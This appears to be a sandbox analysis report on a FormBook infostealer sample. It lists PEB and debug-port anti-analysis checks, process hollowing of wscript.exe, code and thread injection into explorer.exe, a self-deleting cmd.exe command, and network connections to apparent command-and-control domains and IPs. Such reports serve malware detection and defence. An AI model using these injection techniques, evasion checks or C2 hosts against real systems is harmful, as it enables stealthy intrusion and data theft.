Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B0740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B01074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A50050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A50050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ACC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ACC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A635A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A61DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A61DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A61DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B005AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A62581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A32D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A62990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AC41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AFFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AE8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B08D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A54120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A43D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AFE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ABA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A64D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A64D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A64D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A39100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A39100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A39100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A73D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A57D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A352A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B00EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B00EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B00EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04ACFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A62AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A616E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A476E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A78EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B08ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A636CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A62ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AEFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A74A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A74A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AEFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A68E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF1608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A48A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A35210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A35210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A35210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A35210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A3AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A53A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A4766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AEB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AEB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B08A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A7927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A39240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A47E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AFAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AFAE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AFEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AC4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A64BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A64BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A64BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04B05BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AF138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A41B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A41B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AED380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A48794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A62397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A6B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A603E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A5DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04A737F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 11_2_04AB53CA mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 4_2_00409B40 LdrLoadDll,

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.zenginbilgiler.com
Source: C:\Windows\explorer.exe	Domain query: www.bethesdagardensloveland.com
Source: C:\Windows\explorer.exe	Network Connect: 198.46.81.209 80
Source: C:\Windows\explorer.exe	Network Connect: 54.203.72.218 80
Source: C:\Windows\explorer.exe	Network Connect: 103.224.182.241 80
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.42 80
Source: C:\Windows\explorer.exe	Domain query: www.safepostcourier.com
Source: C:\Windows\explorer.exe	Network Connect: 192.64.118.79 80
Source: C:\Windows\explorer.exe	Domain query: www.theangularteam.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.bestpicture-toglancetoday.info
Source: C:\Windows\explorer.exe	Network Connect: 52.49.198.28 80
Source: C:\Windows\explorer.exe	Domain query: www.sharingtechnology.net
Source: C:\Windows\explorer.exe	Network Connect: 45.144.154.230 80
Source: C:\Windows\explorer.exe	Domain query: www.mindfulagilecoaching.com
Source: C:\Windows\explorer.exe	Domain query: www.pawastreams.com

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 3E0000

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Memory written: C:\Users\user\Desktop\tM32bSteJD.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Thread register set: target process: 3352
Source: C:\Users\user\Desktop\tM32bSteJD.exe	Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\wscript.exe	Thread register set: target process: 3352

Source: C:\Users\user\Desktop\tM32bSteJD.exe	Process created: C:\Users\user\Desktop\tM32bSteJD.exe "C:\Users\user\Desktop\tM32bSteJD.exe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tM32bSteJD.exe"

Source: explorer.exe, 00000008.00000000.341457389.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.303445405.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.325713338.0000000000B68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 00000008.00000000.341744973.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.303793671.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.325991694.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000000.308166990.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.341744973.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.303793671.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.325991694.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.341744973.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.303793671.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.325991694.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000008.00000000.341744973.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.303793671.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000008.00000000.325991694.00000000011E0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000008.00000000.334290333.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.312859390.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.349382245.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\Desktop\tM32bSteJD.exe

Code function: 2_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.tM32bSteJD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tM32bSteJD.exe.2200000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tM32bSteJD.exe.2200000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.tM32bSteJD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.337642890.0000000010007000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375611868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375992338.0000000000700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.296283811.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558589620.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.375800193.00000000006A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.298138988.0000000002200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558418128.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.295219336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.558751343.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.tM32bSteJD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.tM32bSteJD.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.tM32bSteJD.exe.2200000.2.raw.unpack, type: UNPACKEDPE
